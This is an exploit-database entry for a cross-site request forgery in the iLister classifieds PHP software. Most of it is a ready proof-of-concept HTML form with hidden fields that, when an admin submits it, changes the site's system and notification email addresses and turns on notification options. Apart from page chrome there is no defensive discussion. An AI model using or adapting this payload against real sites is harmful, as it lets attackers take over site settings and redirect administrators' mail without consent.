[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

iLister CSRF Vulnerability

Author
Jonturk75
Risk
[
Security Risk Low
]
0day-ID
0day-ID-17914
Category
web applications
Date add
01-04-2012
Platform
php
# Exploit Title: iLister CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.worksforweb.com/classifieds-software/iLister/
# Category::  webapps
# Demo : http://demo.worksforweb.com/iLister/admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


<form enctype="multipart/form-data" method="post">
<input size="40" name="system_email" value="mail@mail.com" type="hidden">
<input size="40" name="notification_email" value="mail@mail.com" type="hidden">
<input name="notify_on_listing_added" value="0" type="hidden"><input name="notify_on_listing_added" value="1" checked="checked" type="hidden">
<input name="notify_on_comment_added" value="0" type="hidden"><input name="notify_on_comment_added" value="1" checked="checked" type="hidden">
<input name="notify_on_user_registration" value="0" type="hidden"><input name="notify_on_user_registration" value="1" checked="checked" type="hidden">
<input name="notify_on_listing_expiration" value="0" type="hidden"><input name="notify_on_listing_expiration" value="1" checked="checked" type="hidden">
<input name="notify_on_user_contract_expiration" value="0" type="hidden"><input name="notify_on_user_contract_expiration" value="1" checked="checked" type="hidden">
<input name="notify_user_balance_is_lower" value="0" type="hidden"><input name="notify_user_balance_is_lower" value="1" checked="checked" type="hidden">
<input name="user_balance_threshold" value="10" type="hidden">
<input class="button" value="Save" type="submit">
</form>



#  0day.today [2024-09-28]  #